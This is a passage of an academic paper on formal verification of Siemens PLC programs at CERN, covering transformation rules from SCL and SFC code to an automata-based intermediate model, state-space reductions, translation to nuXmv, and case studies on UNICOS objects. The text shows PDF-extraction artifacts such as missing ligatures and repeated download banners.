PLCs,since these are among the most widely used in the industry and, in particular, at CERN. However, the proposed methodology can be applied to PLCs produced by other manufacturers withonly minor adaptation of the transformation rules, necessary to accommodate the variations of PLC programming languages. A. Execution Scheme The main particularity of the PLC is its cyclic execution scheme. It consists of three main steps: 1) reading the input from periphery to the memory; 2) executing the user program that reads and modi es the memory contents; and 3) writing the values to the output periphery. The cyclic execution can be interrupted if an event (e.g., timer, hardware event, andhardware error) triggers the execution of an interrupt handler. Interrupts are preemptive; they are assigned to priority classes at compilation time. B. Program Blocks In Siemens PLCs, several kinds of program blocks are de ned for various purposes [30]. 1) A function (FC) is a piece of executable code with input, output, and temporary variables. The variables are dynamically stored on a stack and they are not retained after the execution of the function. 2) An organization block (OB) is a special function called by the system. OBs are the entry points of the user code. The main program and the interrupt handlers are implementedas OBs. 3) A data block (DB) is a group of static variables that can be accessed globally in the program. These vari- ables are stored permanently. A DB does not contain any executable code. 4) A function block (FB) is a piece of executable code with input, output, static, and temporary variables. An FB can have several instances and each instance has a separateinstance DB that stores its nontemporary variables. Thus, these variables can be accessed globally, even before or after the execution of the FB. The temporary variables arestored on a stack, as the variables of an FC. C. Programming PLCs provide several standard programming languages. Five languages are de ned in the IEC 61131-3 standard [29]: ST, Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. 1402 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 11, NO. 6, DECEMBER 2015 SFC, Ladder, Function Block Diagram (FBD), and IL. A PLC programmer can chose one or several of these languages, depending on the characteristics of the application, to build the PLC code. The prevalent language at CERN is ST. However, SFC and IL are also used. ILis a low-level language, syntactically similar to assembly. SFC is a graphical programing language based on nite-state machines (FSMs), described using steps (states) and transitions . Two different kinds of branches are de ned: alter- native branches (where at most one of the branches can contain active steps) and simultaneous branches (where each branch contains an active step, or none of them). This formalism is similar to the safe Petri nets, but the semantics is different: the enabled transitions are evaluated once per call and then onlythese transitions can re. If a transition becomes enabled due to a ring, it can re only on the next call of the SFC. Also, steps can have associated actions, such as variable assignments. Thislanguage is useful when part of the PLC program can be rep- resented conveniently as an FSM. STis a high-level language that is syntactically similar to Pascal. In this paper, we target ST and SFC as source languages, more precisely the languages corresponding to them in theSiemens implementations: Structured Control Language (SCL) and S7-GRAPH/SFC. The Siemens implementation follows the IEC 61131 standard as stated by the PLCOpen organization 2 and [31], but there are small syntactic differences between the standard languages and their implementation. SCL language can be used to describe all kinds of program blocks mentionedpreviously, while SFC can only represent an FB. Programs written in any of the above languages are compiled into a common byte-code representation, called MC7, whichis then transferred to the PLC. Based on our experience, we assume that the MC7 instructions are atomic and they cannot be interrupted. A single ST or SFC statement may correspondto several MC7 instructions; thus, it is possible to interrupt an ST or SFC statement. III. M ODELING AND VERIFICATION APPROACH A. Methodology Overview We propose a general methodology for applying automated formal veri cation to any PLC program written in one of the PLC languages. To support multiple PLC languages, a validsolution could be to rst translate them to IL or to machine code, and then only this single, low-level language has to be targeted by veri cation. While this method can be general, itcan cause some information loss. For example, evaluation of an arithmetic expression that could be represented both in the high-level PLC language and in the model checker input lan-guage will be split into several instructions in IL, making the reductions more dif cult and the model checkers less ef cient. Instead, the methodology presented here is based on the IM formalism designed for veri cation purposes (not for machine execution as IL). Each language is translated individually to IM. In this way we can bene t from the higher level inputs (ST vs. IL) that generally provide more information and can be reduced 2[Online]. Available: http://www.plcopen.org/pages/tc3_certi cation/certi ed_products/Fig. 1. Overview of our approach. more ef ciently. The methodology contains a set of rules which can transform automatically PLC code in different modeling languages passing through IM. Furthermore, this intermediate step allows us to compare the different model-checking tools in terms of veri cation perfor- mance, simulation facilities, and properties speci cation. More importantly, as each veri cation tool has different strengths andpurposes, we can use the appropriate tool based on our current needs. Currently, translations to the NuSMV/nuXmv, UPPAAL, and BIP veri cation tools are included in our methodology. IMis based on automata and allows us to extend our methodol- ogy with any veri cation tool which has a similar modeling language (e.g., SAL, Cadence SMV , and LTSmin). The proposed approach consists of the following steps (see Fig. 1). 1) The starting point is the source code of the PLC program and the formalized requirements coming from an informal speci cation. Using the knowledge of the PLC executionscheme, the PLC code is automatically transformed to IM. This transformation is de ned by a set of formal rules presented in Section IV. 2) Several automatic reduction and abstraction techniques are then applied to the generated model, depending on the requirement to be veri ed. 3) The reduced model is automatically translated to external modeling languages, used by the veri cation tools. 4) The resulting external models can be formally veri ed using such tools as nuXmv or UPPAAL. Other tools (e.g., BIP) provide simulation and code generation facilities, which can be useful for PLC developers. 5) Counterexamples produced by model checkers allow PLC developers to analyze the results in order to con rm thepresence of bugs in the system or re ne the models. B. Intermediate Model This section describes brie y the syntax and semantics of IM our automata-based formalism used to represent the PLC programs. We de ne a simple automata network model consist- ing of synchronized automata. Anetwork of automata is a tuple N=(A,I), whereAis a nite set of automata and Iis a nite set of synchronizations. An automaton is a structure a=(L,T,l 0,Va,Val0) A, whereL={l0,l1,...}is a nite set of locations, Tis a nite set of guarded transitions, l0 Lis the initial location of the automaton, Va={v1,...,v m}is a nite set of vari- ables, and Val0=(Val 1,0,...,Val m,0)is the initial value of the variables. Let Vbe the set of all variables in the network of automata N, i.e., V=/uniontext a AVa( a,b A:Va Vb= ifa/negationslash=b).Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. FERN NDEZ ADIEGO et al. : APPLYING MODEL CHECKING TO INDUSTRIAL-SIZED PLC PROGRAMS 1403 Atransition is a tuplet=(l,g,amt,i,l/prime), wherel Lis the source location, gis a logical expression on variables of Vthat is the guard, amt is the memory change (variable assignment, i.e., a function that de nes the new values of the variables in V), i I {NONE}is a synchronization attached to the transition, andl/prime Lis the target location. Asynchronization is a pair i=(t,t/prime), wheret Tand t/prime T/primeare two synchronized transitions in different automata. The variable assignments attached to the transitions tandt/prime should not use the same variables. This composition opera- tion is restrictive, but suf cient to model PLC programs, as synchronizations will only represent function calls. The operational semantics of this automata-based formal- ism can be informally explained as follows: a transition t= (l,g,amt,i,l/prime)from the current location lof an automaton is enabled if gis satis ed and either thas no synchronization attached, i.e., i=NONE, or i=(t,t/prime)and the transition t/primeis also enabled. In the former case, tcan re alone; in the latter case, both tandt/primehave to re simultaneously. Each execution step consists in ring one transition or simultaneous ring of two synchronized ones. Upon ring of a transition tas above, l/prime becomes the new current location of the corresponding automa- ton and the new values of variables Vare set using the previous values and the variable assignment amt. IV. M ODEL TRANSFORMATIONS This section describes in detail the most relevant transfor- mation rules from SCL and SFC to IM.3Some of these rules are generic and apply to all PLC languages; the rest are spe-ci c to SCL or SFC. In addition, a high-level description of the reduction techniques applied to IM models and the transfor- mation from IM to nuXmv are presented. Also, the main ideas of the tool implementing the methodology and some examples are discussed. This section extends and generalizes the previouswork [3]. A. General PLC to IM Transformation The transformation rules are presented hierarchically from high-level to low-level rules. Rule PLC 1 (multiple concurrent code blocks): PLC pro- grams are composed by the main program (i.e., OB1 in Siemens PLCs), which is executed cyclically, and the interrupt handlers. Assumption 1: Interrupting blocks and the interrupted blocks should use disjoint set of variables. This is a reasonable assump- tion, and it can be validated by existing static analysis tech- niques. According to our experience, different OBs usually use different variables. Furthermore, a high level of concurrency israre in PLC programs. Having this assumption, instead of modeling the interrupts in a preemptive manner, we model them with nonpreemptivesemantics: the model of the PLC scheduler consists in the main 3In the case of SCL, we have focused on the representation of the key con- structions, and we have omitted the description of, e.g., CASE blocks, REPEAT loops, and FOR loops. The handling of expressions, structure, and array initial-izations, and some Siemens-speci c constructs (e.g., shared DBs) are also not discussed, but we have implemented them following the same principles. In the case of SFC, only the action representations are omitted here.program being executed at every cycle, whereas one or several interrupts can be executed nondeterministically at the end of the PLC cycle. Rule PLC 2 (FC): This rule translates functions into IM. An OB can be considered as a special FC that is invoked by theoperating system, thus this rule also applies to OBs. Assumption 2: Recursion is not allowed, i.e., no FC or FB can directly or indirectly generate a call to itself. This assump-tion is consistent with the IEC 61131 standard [29]. However, Siemens PLCs allows the use of recursion with some restric- tions even if it is not recommended. Recursion can be staticallydetected by building the call graph of a program and checking whether it contains cycles. Thus, we can assume that variables of a function are stored at most once on the stack. For each function Func , we create an automaton A F unc .T h e locations, transitions, and initial location of this automaton are generated using the rules presented below. For each variablede ned in Func , we create a corresponding variable in A F unc . If the return type of the function is different from void ,a special output variable called RET_VAL is also added to the automaton. AF unc contains at least the initial location init,t h e nal location end, and the transition tendfrom endtoinit. Rule PLC 3 (FB instance): This rule translates FB instances into IM. Assumption 2 also applies here. For each instance inst of each FB FBlock , we create an automaton AF Block,inst . The locations, transitions, and ini- tial location of this automaton are generated using the rules presented below. For each variable in FBlock , we create a corresponding variable in all the corresponding AF Block,inst automata. Each automaton contains at least the initial location init, the nal location end, and the transition tendfrom endto initwithout any guard. Rule PLC 4 (V ariables): This rule maps program variables to variables in the IM model. Assumption 3: All variables, except system inputs, that do not have uniquely de ned initial values on the PLC platform (e.g., temporary variables, output variables of FCs) are written before they are read. This means that we do not have to model such variables as nondeterministic variables in the IM model,which allows us to limit the state space growth of the generated model. For each variable vin the program block, there is exactly one corresponding variable F V(v)in the corresponding automa- ton. If the variable represents a system input (i.e., variables representing signals coming from the eld), it is assignednondeterministically at the beginning of each PLC cycle. B. SCL to IM Transformation This section presents the rules speci c to the SCL to IM transformation. Rule SCL 1 (SCL statement): A statement is the smallest standalone element of an SCL program. It can contain other components (e.g., expressions). There are different kinds ofstatements such as conditional branches, loops, and variable assignments. In this section, we de ne the representation of a single code block consisting of these statements in our IM. For each statement stmt ,l e tn(stmt )be the next statement afterstmt . Furthermore, for a statement list sl,l e tfirst (sl) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. 1404 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 11, NO. 6, DECEMBER 2015 be the rst statement of the list. Assumption 1 also applies here. For each SCL statement stmt in the program block, we generate a corresponding location marked as FL(stmt )in the corresponding automaton. If stmt is the last statement in the program block, FL(n(stmt ))is the location end of the corre- sponding automaton. This general rule is applied to any state- ment, then more speci c rules presented in the following are applied too. Rule SCL 2 (variable assignment): This rule translates SCL variable assignments to IM. Assumption 4: For each variable access the variable to be accessed can be determined at transformation time. In partic- ular, this means that pointers are not supported. However, we do support compound variables (arrays and user-de ned struc-tures). Typically, this is not a restriction as the usage of pointers is not recommended in PLC programs. For each variable assignment stmt =/angbracketleftv:=Expr/angbracketright, we add to the corresponding automaton a transition t=(F L(stmt ),TRUE,/angbracketleftFV(v):=Expr/angbracketright,NONE,FL(n(stmt ))), going from FL(stmt )toFL(n(stmt ))with no guard and no synchronization. The assignment associated with the transition updates only the variable FV(v). Rule SCL 3 (conditional statement): For each conditional statement stmt =/angbracketleftIF c THEN sl 1ELSE sl 2END _IF/angbracketright,w e add two transitions to the corresponding automaton. 1)t1=(FL(stmt ),c,/angbracketleft/angbracketright,NONE,FL(first (sl1))) goes fromFL(stmt )toFL(first (sl1)), it has no assignments and no synchronizations, and it has a guard c. 2)t2=(FL(stmt ), c,/angbracketleft/angbracketright,NONE,FL(first (sl2))) goes fromFL(stmt )toFL(first (sl2)), it has no assignments, no synchronizations and the guard c. Rule SCL 4 (while loop): For each while loop stmt = /angbracketleftWHILE c DO sl END _WHILE/angbracketright, we add two transitions to the corresponding automaton. 1)t1=(FL(stmt ),c,/angbracketleft/angbracketright,NONE,FL(first (sl)))goes from FL(stmt )toFL(first (sl)), it has no assignments and no synchronizations, and it has a guard c. 2)t2=(FL(stmt ), c,/angbracketleft/angbracketright,NONE,FL(n(stmt )))goes from FL(stmt )toFL(n(stmt ))), it has no assignments, no synchronizations, and the guard c. This transition cor- responds to exiting loop. Note that if stmt is a while loop, n(stmt )will denote the next statement after the loop . If the last statement of the loop body isstmt/prime, thenn(stmt/prime)=stmt , as after executing the last statement of the loop body, the next step is to check thecondition again. The for and repeat loops can be expressed based on the rules for conditional branches and while loops. Rule SCL 5 (FC or FB call): Assumption 5: All the input variables are assigned in the caller, and all the output variables are assigned in the callee toavoid the accessing of uninitialized variables that could con- tain unpredictable values. Therefore, they are not modeled as nondeterministic variables, which allows us to limit the statespace growth of the generated model. For every function (block) call stmt =/angbracketleft[r:=]Func (p 1:= Expr1,p2:=Expr2,...)/angbracketrightin a code block represented by an automaton Acaller, we add the following elements. ( Func can bea function or an instance of an FB, represented by an automaton Acallee.I f Func is an FB or a void function, the r:= part is omitted.) 1) A new location lwaitis added to Acaller. It represents the state when the caller block is waiting for the end of thefunction call. (For every function call, we add a separate l waitlocation.) 2) A transition t1is added to Acaller, which has no guard and goes from FL(stmt )tolwait. It assigns the function call parameters to the corresponding variables in Acallee.( I t assignsExpr1toFV(p1), etc.) 3) A transition t2is added to Acaller, which has no guard and goes from lwaittoFL(n(stmt )). It assigns RET_VAL of the callee to the corresponding variable (variable FV(r)) inAcaller,i f RET_VAL exists. It also assigns the corre- sponding values to the output variables. 4) A synchronization i1is added to the automata network, connecting transition t1with the rst transition of Acallee. 5) A synchronization i2is added to the automata network, connecting transition tendofAcallee with transition t2. C. SFC to IM Transformation This section presents a high-level overview of the rules speci c to the SFC to IM transformation. In the following discussion, we do not target the actions that can be assigned to the SFC steps. However, based on the SCL and SFC transformation rules, they can be incorporated easily. The main idea of the following transformation is that for each SFC step s, we create two variables: the step ag variable a variable that indicates if the current step is active,denoted as s.xin the standard and in the Siemens implemen- tation; and another variable that will store a copy of the s.x variables at the beginning of the SFC s call (denoted by s.x /prime in the following example). The conditions of the transitions will be evaluated on this copy, thus ring of a transition cannot make new transitions enabled. Rule SFC 1 (SFC step): For each step /angbracketleftSTEP stepName :END _STEP/angbracketright, we create a Boolean variable FV(stepName )(representing the variable referenced as step- Name .x in the PLC programs or in the standard [29]) and a variableF/prime V(stepName )for internal purposes, both initialized to FALSE. Rule SFC 2 (SFC initial step): For the initial step /angbracketleftINITIAL _STEP initStep :END _STEP/angbracketright, variables are cre- ated according to the previous rule. We also add a loca- tionl0, and a transition tIM=(l0,g,amt, NONE,end ), where g=( FV(stepName1) FV(stepName2) ...),amt = /angbracketleftFV(initStep ): =TRUE/angbracketright. It means that if no steps are active, then the initial step should become active. Before discussing the representation of transitions, we de ne as e tW={w1,w2,...}. Each item of Wis a pair wi= (Si,Ti)whereSiis a possible transition input (step or set of steps occurring in one of the transition s FROM part) andT iis the set of SFC transitions outgoing from Si. The union ofTisets inWshould contain all the transitions of the SFC. A transition input ( Si) is typically one single SFC step, but for the transitions closing simultaneous branches, it can be Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. FERN NDEZ ADIEGO et al. : APPLYING MODEL CHECKING TO INDUSTRIAL-SIZED PLC PROGRAMS 1405 composed of multiple SFC steps. These latter transitions have multiple from steps and one to step. (In the following, let l|W|+1=end.) Rule SFC 3 (SFC transitions): Assumption 6: Based on our experiments with the SFC editor of Siemens, we assume that transitions are de ned in ascending order of priority in the textual representation4that is our input. Also, if there is a transition that is leaving multiple steps at thesame time (thus closing a simultaneous branch), there should not be any other transition leaving any of these steps. If this is not respected, the SFC is regarded as syntactically incorrect inthe Siemens tools. For eachw i=(Si,Ti)=({s1,s2,...},{t1,t2,...})inW, we create the following IM representation: We create a location li. For each tj=/angbracketleftTRANSITION tName FROM s 1,s2,... TOs/prime j1,s/prime j2,... C O ND ITIO N := CE N D _TRANSITION /angbracketright, we create a transition tIM=(li,gIM, amt, NONE,li+1). The guard gIMoftIMis a Boolean expres- sion that is only true if Cis true,F/prime V(s1),F/prime V(s2),... are true, and all the guards of transitions t1,...,t j 1are false. In other words, the condition of the SFC transition should be satis ed, the input SFC step(s) should be active, andno higher priority event leaving the same SFC step(s) can re. The assignment is amt =/angbracketleftF V(s1): = FALSE ;FV(s2): = FALSE ;...;FV(s/prime j1): = TRUE ;FV(s/prime j2): = TRUE ;.../angbracketright.( W e assume that t1,t2,... are indexed in descending order of priority.) Also, for each wi, we add a transition t/prime IM= (li,g/prime,/angbracketleft/angbracketright,NONE,li+1)whereg/primeis true if no other li li+1 IM transitions are enabled. If no SFC transitions are allowed fromSi(orSiis not active), this transition allows to proceed to other transitions. Rule SFC 4 (SFC block): This rule adds the needed extra information for SFC blocks to the IM. We add a transition tIMfrominit tol0that will do a F/prime V(s): =FV(s)assignment for all SFC step s. The guard of transition tIMis true if any of the steps is active. D. Reductions on the IM The transformation described above allows us to create an IM representation of a PLC program. However, veri cation ofthe models produced from real-life programs is still not fea- sible with the available tools. In order to address this issue, we apply property-preserving reductions to the IM model. Thisemphasizes the advantage of using an IM: the reductions are only performed once and propagate automatically to the models generated for the various veri cation tools. 1) The cone of in uence (COI) reduction eliminates all the variables that do not in uence those that contribute to therequirement under analysis. 2)General rule-based reductions simplify the model by merging states or variables, eliminate unnecessary con-ditional branches, simplify the Boolean expressions, etc. 3) Using the mode selection , certain inputs (representing parameters) of the modeled system can be xed. By intro-ducing these constraints in the IM model instead of in 4The rst transition in the textual representation has the lowest priority.Fig. 2. Variable dependency graph of an example PLC program. the requirement, the other reduction methods can bene t from this knowledge. These reductions are presented in more detail in [4].In addition to the reductions above, we have developed a new method called variable abstraction . This technique is an iterative method focused on the veri cation of simple safetyrequirements, e.g., if is true, then shall be true ( AG( )in CTL), where and denote Boolean expressions on vari- ables. This technique builds the abstract models automaticallyusing the variable-dependency graph of . These models are built by replacing the selected variables with nondeterministic values (similar to the input variables). Since these variables donot depend on any others, the COI algorithm can eliminate more variables from the model. Fig. 2 shows a simple variable dependency graph for the requirement AG(a b)(so ={a}, ={b}in this exam- ple). In this graph, nodes represent variables. The gray variablesare part of the requirement ( aandb) and the edges represent dependencies (e.g., an assignment or a conditional statement). We de ned a distance metric for each variable of the graph. Its value is the smallest distance from a variable in .I nt h eith iteration, the variables with =iare replaced by nondetermin- istic values and the variables with >i are deleted. If for any a , (a)>i, thenais replaced by a nondeterministic value instead of deleting it. In the rst iteration of the example, the variables to be replaced by nondeterministic values are: a,y, andx.I ft h e veri cation result is true, then the safety requirement is sat- is ed on the original model, as the abstract model is anover-approximation of the original one. If the veri cation result is false and it cannot be determined if the counterexample is real or spurious, a new iteration is needed. More precisely, in order to abstract a set of variables V,w e perform the following steps on the abstract syntax tree of thePLC code, for each v V. 1) All assignments of the variable vare removed. 2) An assignment v:= unde ned is added at the begin- ning of the scan cycle, meaning that the value of vwill be unde ned and it will take any value from its domain. This technique is sound, i.e., if a safety property holds after variable abstraction, it holds in the original system. However, it is not complete, meaning that spurious safety violations can be detected, since variable abstraction generates behaviors notpresent in the original system. Such spurious violations can be detected by analyzing the counterexamples. Variable abstrac- tion is illustrated in Section V and its implications on theveri cation process are discussed in Section VI. E. IM nuXmv Transformation The IM model representing the PLC code has to be transformed into the concrete syntax of one or more Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. 1406 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 11, NO. 6, DECEMBER 2015 Fig. 3. Example SCL IM nuXmv translation. model checking tools to verify the given requirements. Our methodology is general and can be applied for any model checker with an input language based on automata or transitionsystems. Here, we brie y introduce the transformation from IM to the input language of nuXmv [32] as an example. For each automaton Ain the IM model, we create a mod- uleM Ain the nuXmv model with exactly one instance. Each variable in Ais represented by a variable in the module MA. Furthermore, a variable locis added to each module MAthat represents the current location of the automaton A. A module main is also created in the nuXmv model contain- ing a variable synch enumerating all possible synchronizations and the value NONE. At each cycle, this variable encodes the synchronization to be performed. F. Transformation Examples The following shows two examples of the transformations described in this section. Fig. 3 shows an example transformation from SCL code (1) through IM model (2) to nuXmv model (3). The SCL codecontains a conditional statement, a while loop and three vari- able assignments to Boolean and integer variables. In Part 2 of Fig. 3, one can observe the true and false branches of theconditional statement ( l 1 l2 andl1 l3 ) and the representation of the while loop ( l3 l4). The key ideas of the transformation to nuXmv can be seen in the Part 3. The variableloc de ned in line 3 represents the locations of the automaton. The transitions and guards are de ned by the case statement in lines 9 21 (e.g., line 13 represents the transition l 1 l2 with guard [ia > 0]). The variable updates are given separately in lines 23 38 (e.g., loc =l4:(IB+0sd16 _1) in line 30 for the variable update ib:=ib+1of transition l4 l5). The global structure (e.g., main module, instances, random value handling) of the generated nuXmv model can also be observed. Part 1 of Fig. 4 shows an example SFC program.5The steps are represented by gray boxes (S1, S2, etc.), and the transitions 5Note that it is a directed graph, but in Siemens notation, the arrows are only shown if direction is not top to bottom.Fig. 4. Example SFC IM translation. are represented by black rectangles. The transition T1 opens a simultaneous branch (denoted by double line), thus after ringT1, both S2 and S3 will be active. On the contrary, S3 is fol- lowed by an alternative branch: either T2 or T3 can re. If T2 res, S4 will be active; if T3 res, S5 can be active. T6 will only re if both S2 and S6 are active. Each transition can only re if its condition is evaluated to true. The conditions are not shown in the gure, but for each T i the corresponding condition (guard) is the Boolean variable C i. The corresponding IM model is shown in Part 2 of Fig. 4. For each step S i, the corresponding FV(Si)variable is denoted by si.x, the corresponding F/prime V(Si)variable is denoted by s i.x/prime.T h e reason for using both xandx/primeis to avoid transition chaining , i.e., when the ring of the transition enables another transitionthat res too. For example, ring T6 can enable T7 (provid- ing thatC 7is true), but according to the semantics of Siemens SFCs, this ring can only performed when the SFC is called for the next time. The parallel activation of S2 and S3 can be observed in the variable updates of the l1 l2IM transition. The alternative activation of S4 and S5 is visible in the l2 l3 IM transitions. The set W de ned for the transformation (cf., rule SFC3) is given in the following example: W= {({S1},{T1}),({S2,S6},{T6}),({S3},{T2,T3}),({S4}, {T4}),({S5},{T5}),({S7},{T7})}. The rst and the last transitions of the IM model contain the synchronizations with other automata. These synchronizations represent the FB call of the SFC block. G. Implementation of the Methodology The methods presented above are implemented in a proof- of-concept tool called PLCverif . The PLC input parser is implemented using Xtext.6The provided abstract syntax tree is the input of the transformation and reduction algorithms 6[Online]. Available: http://eclipse.org/Xtext/ Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. FERN NDEZ ADIEGO et al. : APPLYING MODEL CHECKING TO INDUSTRIAL-SIZED PLC PROGRAMS 1407 implemented in Java. The whole procedure is implemented in an Eclipse-based tool that allows the user to import the PLC code and de ne the requirement to be veri ed. It also performs the model transformations, the automated model reductions, and calls the model checker tools. The feedback provided tothe user is a veri cation report containing the result of the veri- cation and the eventual counterexample. The de nition of the code and requirement to be veri ed is the only task of the user,all the rest is automated and hidden. PLCverif is not available yet, but our plan is to make it production-ready and downloadable from our website. 7 V. E XPERIMENTAL RESULTS This section provides experimental veri cation results on CERN PLC programs and real requirements. Most of the con- trol systems used at CERN are developed using the Uni ed Industrial Control System (UNICOS) framework. This frame-work provides a common development process and a library of reusable base objects representing frequently used indus- trial control instrumentation (e.g., sensors and actuators). Wepresent two typical formal veri cation use cases. In the rst example, we check requirements on the model of a single base object from the UNICOS library consisting mainly ofa single FB with some function calls. The second example shows the veri cation of a requirement on a complete UNICOS application controlling a cryogenics subsystem. This applica-tion consists of hundreds of base object instances and a large application-speci c logic. A. V eri cation of a UNICOS Base Object In this section, we present the veri cation of the UNICOS base object OnOff , which represents an actuator driven by digi- tal signals (e.g., valve, heater, and motor). This object can run in different con gurations with different parameters and in various modes; it can handle various errors. In the PLC code, the OnOff object is implemented by an FB written in SCL. This FB has 600 lines of code, 60 input vari- ables, and 62 output variables. The data types used in this blockare Booleans, integers, arrays, oats, and structures, e.g., an array composed of these data types. The FB has several function calls to three different functions. The following is a real requirement expressed informally by the UNICOS developers: if the object is controlled locally (is in the so-called hardware mode) and there is no interlock, norexplicit output change request valid in this mode, the output keeps its value . To help developers to express real requirements and to facili- tate the cooperation between developers and formal veri cation experts, we de ned a set of easy-to-use requirement patterns(for details, see [33]). Using this patterns, a developer was able to formalize the requirement using variables and Boolean expressions as follows: If OutOnOV=false & TStopI=false & FuStopI=false & StartI=false is true at the end of cycle N and HLD=true & HOnR=false & HOffR=false & TStopI=false 7[Online]. Available: http://cern.ch/plcverif/TABLE I METRICS OF THE MODELS OF ONOFF & FuStopI=false & StartI=false is true at the end of cycle N+1, then OutOnOV=false is always true at the end of cycle N+1. Requirements expressed using our patterns can be automatically formalized in LTL as G((EoC OutOnOV T StopI F uStopI StartI HLD X( EoC U(EoC HLD HOnR HOffR T StopI F uStopI StartI ))) X( EoC U(EoC OutOnOV ))). In this formula, EoC is a Boolean symbol, which evaluates to true at the end of each PLC cycle and only then. Table I summarizes the performance metrics of the approach.8Before the reductions, the size of the potential state space (PSS) is 1.6 10218. After the general and requirement- dependent reductions, the PSS has 4.3 1026states, whereof 4.9 1014are reachable. Evaluation of the requirement takes 6.1 s using nuXmv without counterexample generation. Thisshowed that the requirement is not satis ed. If the counterex- ample is generated too, the run time is 19.4 s. The generation of the model including all the reductions takes 0.6 s. We used the counterexample generated by nuXmv to prove that the bug detected in our model is, indeed, a real bug. To this end, we have analyzed the counterexample and automat-ically generated a PLC program, exhibiting the bug on real hardware using the real code of the base object. This generated PLC code drives the module under veri cation to a state where the requirement is violated by feeding it with appropriate input values extracted from the counterexample. Thus, the discoveredbug was not a result of our model generation technique, but was also con rmed in the real PLC code. This methodology has been found very useful for the controls engineer. We have veri ed 52 different requirements provided by UNICOS developers for the OnOff object. Our experiments identi ed 11 cases when the requirement was not satis edon this well-tested object used in numerous CERN applica- tions. In four cases, the PLC program had to be modi ed. In seven cases, the problem was due to incomplete or badspeci cation. B. V eri cation of a Full UNICOS PLC Application We have chosen the so-called QSDN application 9as a sec- ond case study. This application controls one of the cryogenicssubsystems of the Large Hadron Collider, illustrated in Fig. 5. 8The measurements were performed on a PC with Intel Core i7-3770 3.4 GHz CPU, 8 GB RAM, on Windows 7 x64. 9QSDN stands for Cryogenics Surface Liquid Nitrogen Storage System. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. 1408 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 11, NO. 6, DECEMBER 2015 TABLE II METRICS OF THE MODELS OF QSDN The size of QSDN is representative of medium size UNICOS applications. It contains 110 functions and FBs, and con- sists of approximately 17 500 lines of code. Before reductions, this results in a huge generated model: the IM contains 302automata, and the PSS size is 10 31985(seeM1in Table II). Veri cation of a full UNICOS application may rely on speci- cations of base objects of the UNICOS library, instead of theirimplementation. The correctness of these objects is addressed separately (cf., Section V-A). Thus, we speedup the veri ca- tion process and focus the analysis on the potential integration errors without compromising its soundness. This is in contrast with testing, where a faulty base object could potentially hideintegration errors. Thus, the goal is to check the application-speci c logic implemented in SCL and SFC. This logic is described in theUNICOS functional analysis document, which is a semi-formal textual speci cation. Application-speci c functional require- ments are also extracted from this speci cation. Table II presents metrics relevant to the generated models. The original state space is huge and the original model obvi- ously cannot be veri ed (see M 1in Table II). Based on the requirement to be veri ed, both the general and requirement- speci c reductions can be used to reduce the model. Although these techniques have shown their ef ciency and lead to a con-siderable state space reduction, the reduced model is still huge and impossible to verify. The requirements extracted from the functional analysis are typically simple safety requirements, e.g., if is true, then is true (in CTL, AG( )), where and denote Boolean expressions on variables. The example requirement to be checked is the follow- ing: If QSDN _4_DN1CT _SEQ_DB.Stop.xis true (at the end of a scan cycle), QSDN _4_1EH4001Ok .AuOffR should be true also. Fig. 6 shows the relevant part of the QSDN PLC code. Satisfaction of the requirement cannot be shown by inspec-tion of this code part and requires additional information from the rest of the application. After the COI reduction, 3757 vari- ables are kept in the reduced model (see model M 2in Table II). Formal veri cation is still not possible. In this example, four iterations of the variables abstraction were needed to prove that the requirement is satis ed on theformal model. Using this technique, less than a minute was necessary to check this requirement (see M 3in Table II). As can be seen, our veri cation method can be used for isolatedveri cation of modules or for veri cation of complete PLC applications. Approximately 30 different requirements were extracted from the QSDN functional analysis document, all of which were proven to be satis ed using the above method.Fig. 5. QSDN process. Fig. 6. Excerpt of QSDN code relevant to the case study. VI. A NALYSIS AND DISCUSSION The proposed methodology allows the generation and anal- ysis of formal models for real-life systems. Using these tech- niques, we have identi ed bugs in real-life systems deployed at CERN. Veri cation is made possible by the reduction techniques applied to the IM representation of such systems. Among the techniques discussed in this paper, COI, general rule-basedreductions, and mode selection preserve the meaning of the model as relevant to a speci c property: the property is satis ed in the reduced model if and only if it is satis ed in the original one. The variable abstraction technique adds spurious system behaviors by introducing nondeterminism. If a safety prop- erty holds in the reduced model, it holds in the original one. However, spurious counterexamples may occur. If the propertydoes not hold in the abstract model and a counterexample is pro- duced, further analysis must be performed to determine whether it represents a real bug. Such analysis requires the expertise ofa developer and knowledge of the application. If the counterex- ample represents a possible behavior of the system, a real bug is identi ed and the veri cation process terminates. If this analy-sis cannot prove that the counterexample is spurious, the model needs to be re ned to reduce abstraction. In particular, appli- cation developers can re ne a model by providing invariants,i.e., properties that are known to be satis ed in all reachable states of the model. For example, the statement two steps of an SFC program cannot be both active at the end of the samePLC cycle is an invariant satis ed by all SFC programs that do not contain parallel branches. The above process is applied iteratively until the requirement is shown to be satis ed or a bug is identi ed. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. FERN NDEZ ADIEGO et al. : APPLYING MODEL CHECKING TO INDUSTRIAL-SIZED PLC PROGRAMS 1409 In the current state of the methodology, we cannot prove mathematically the correctness of all our model transforma- tions. However, when a discrepancy between the speci cation and the formal model is detected, we can prove that this bug exists in the real PLC program. A small piece of code called PLC demonstrator can be automatically generated out of the counterexample given by the model checker. This code repro- duces the combination of input variable values that provoke thediscrepancy and the monitor will check if the bug is reproduced also in the real PLC program. A. Correctness of Our Approach Apart from the combinatorial explosion of the state space, a 